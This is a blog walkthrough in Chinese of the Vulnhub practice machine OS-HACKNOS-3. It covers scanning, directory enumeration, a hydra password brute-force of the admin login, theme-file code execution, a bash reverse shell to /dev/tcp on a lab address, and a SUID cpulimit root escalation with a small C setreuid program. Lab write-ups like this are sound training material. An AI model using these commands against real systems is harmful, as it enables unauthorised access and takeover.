【Vulnhub】靶机OS-HACKNOS-3

admin 2022年1月10日03:33:48评论89 views字数 1187阅读3分57秒阅读模式

前言

  • Vulnhub刷题简单记录

OS-HACKNOS-3

描述

  • 难度:中级

    Flag: 2 标记第一个用户和第二个根用户

    学习:Web 应用程序 | 枚举 | 权限提升

    网址:www.hacknos.com

https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/

OS-HACKNOS-3

1、可以用两种方法确认靶场的存在,扫ip

1
2
netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

1
2
3
nmap -p- -T5 192.168.56.102 #全端口扫描
nmap -sV -sC -p 22,25,80,110 -A 192.168.56.102 -o h-3
nmap -p- -A 192.168.56.102 -T5 -oA h-3

3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况

1
2
3
4
5
gobuster dir -u http://192.168.56.102/websec -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 --wildcard | grep -v 4647

dirb http://192.168.1.102/

dirsearch -u 192.168.136.150 -e* -x 403

4、爬取页面的关键词,页面也收集到邮箱[email protected]

1
cewl http://192.168.56.102/websec/ > cewl.txt

5、接着用hydra爆破页面

1
hydra -l [email protected] -P cewl.txt  192.168.56.102 http-post-form "/websec/admin:username=^USER^&password=^PASS^:Wrong email" -V

image-20210923212338360

6、进入管理员后台,经典的theme改header.php来直接命令执行和反弹shell

image-20210923212634589

1
bash -c 'exec bash -i &>/dev/tcp/192.168.56.1/1234 0>&1'

5、利用suid提权

1
2
find / -type f -perm -u=s 2>/dev/null
/usr/bin/cpulimit

6、用c语言写个root权限执行bin/sh

1
2
3
4
5
6
7
8
9
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc,char *argv[])
{
setreuid(0,0);
execve("/bin/bash",NULL,NULL);
}

image-20210923220037602

image-20210923220134498

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:33:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Vulnhub】靶机OS-HACKNOS-3http://cn-sec.com/archives/730030.html

发表评论

匿名网友 填写信息